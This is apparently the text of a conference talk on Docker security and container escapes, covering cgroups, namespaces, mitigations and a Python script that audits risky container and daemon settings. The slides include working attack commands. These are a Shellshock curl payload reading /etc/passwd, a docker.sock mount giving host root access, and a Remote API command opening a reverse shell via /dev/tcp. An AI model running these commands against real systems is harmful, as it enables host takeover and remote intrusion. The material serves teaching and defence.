Vaibhav Gupta
Twitter: @VaibhavGupta_1
It's all about Docker!
• About Docker – 1 min Primer
• Cgroups & Namespaces – Quick Demo
• Docker Attack Surface
  1. Exploiting Vulnerable Images
  2. Docker --privileged flag
  3. Privilege Esc. Using Docker.Sock
  4. Abusing Docker Remote API
• Docker is just a way of running processes with limited privileges
• DEMO
  • docker run -it ubuntu sh
  • ps aux | grep sleep  (run on the host: the container's processes show up as ordinary host processes)
• Cgroups
  • docker run -itd --pids-limit 5 alpine
  • sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10  (once the pids cgroup limit is reached, the remaining sleeps fail to start)
• Namespaces (e.g. user namespaces)
  • vi /tmp/root-file.txt  (create a root-owned file on the host)
  • docker run -itd -v /tmp:/shared alpine
  • Edit the file within the container (it works: without a user namespace, root in the container is root on the host)
• Mitigation
  • sudo dockerd --userns-remap=default
DOCKER ATTACK SURFACE
• Vulnerable Images
• Container running with unintended privileges
• Docker Daemon Misconfigurations
• Un-Auth Docker Client Remote API
• Misconfigured or Vulnerable Hosts
• Insecure Registry
• Backdoored Images
• ??
EXPLOITING VULNERABLE IMAGES
• Sample Vulnerable App
  • docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271
• Exploitation
  • curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi-bin/vulnerable
• Some containers require /var/run/docker.sock to be mounted inside them
• It is needed when the container has to interact with the Docker host
• For example, a 'Dockerized' host-monitoring application
  • docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
  • docker exec -it <id> sh
  • apk update
  • apk add -U docker
  • docker -H unix:///var/run/docker.sock run -it -v /:/test:ro -t alpine sh  (the mounted socket lets the container start a new container with the host's root filesystem)
• The Docker Remote API allows interaction with a remote Docker daemon
• No authentication required - by default
• Let's gain a shell!
  • sudo apt install jq
  • sudo vi /lib/systemd/system/docker.service
  • ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
  • sudo systemctl daemon-reload
  • sudo service docker restart
  • curl http://localhost:2375/containers/json | jq
  • docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"
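The docker.sock and Remote API slides above both come down to host settings a defender can check for. The following audit script is an added example, not part of the original deck: it reads `docker inspect`-style JSON (a constructed sample is embedded) and a `docker.service` ExecStart line, and flags the settings shown on these slides (privileged containers, a mounted docker.sock, the host root bind-mounted, an unauthenticated TCP listener, and no user namespace remap). The finding strings and sample container names are my own.

```python
"""Audit Docker container and daemon settings for the escape paths discussed above."""
import json
import re

# Constructed sample: trimmed `docker inspect` output for three containers.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/monitor", "HostConfig": {"Privileged": False,
     "Binds": ["/var/run/docker.sock:/var/run/docker.sock"], "CapAdd": None}},
    {"Name": "/debug", "HostConfig": {"Privileged": True,
     "Binds": ["/:/mnt"], "CapAdd": ["SYS_ADMIN"]}},
    {"Name": "/web", "HostConfig": {"Privileged": False,
     "Binds": ["/srv/www:/usr/share/nginx/html:ro"], "CapAdd": None}},
])
# Constructed sample: the ExecStart line from the docker.service edit on the slide.
SAMPLE_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"


def audit_containers(inspect_json):
    """Return {container_name: [findings]} for containers with escape-prone settings."""
    findings = {}
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        issues = []
        if hc.get("Privileged"):
            issues.append("privileged")  # --privileged: all capabilities, host devices
        for bind in hc.get("Binds") or []:  # each entry is src:dst[:options]
            src = bind.split(":")[0]
            if src == "/var/run/docker.sock":
                issues.append("docker.sock mounted")  # daemon control == root on host
            elif src == "/":
                issues.append("host root mounted")  # -v /:/mnt as on the slide
        if "SYS_ADMIN" in (hc.get("CapAdd") or []):
            issues.append("CAP_SYS_ADMIN added")
        if issues:
            findings[c["Name"].lstrip("/")] = issues
    return findings


def audit_daemon(execstart):
    """Return findings for the dockerd command line: open TCP API, no userns remap."""
    issues = []
    tcp = re.findall(r"-H\s+tcp://(\S+)", execstart)
    if tcp and "--tlsverify" not in execstart:
        issues.append("unauthenticated remote API on " + ", ".join(tcp))
    if "--userns-remap" not in execstart:
        issues.append("user namespace remap not enabled")
    return issues


if __name__ == "__main__":
    print(audit_containers(SAMPLE_INSPECT))
    print(audit_daemon(SAMPLE_EXECSTART))
```

On a real host, feed it `docker inspect $(docker ps -q)` and the ExecStart line from `systemctl cat docker`.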
• docker run -itd alpine
• docker run --rm -it --cap-drop=NET_RAW alpine sh
  • ping 127.0.0.1 -c 2  (compare the result with and without the capability)
• Printing capabilities: capsh --print
• https://docs.docker.com/engine/security/security/
• https://docs.docker.com/engine/security/userns-remap/
• https://securityboulevard.com/2019/02/abusing-docker-api-socket/
• Email: Vaibhav.Gupta @ owasp.org
• Twitter: @VaibhavGupta_1
• Blog: https://exploits.work

Demystifying Container Escapes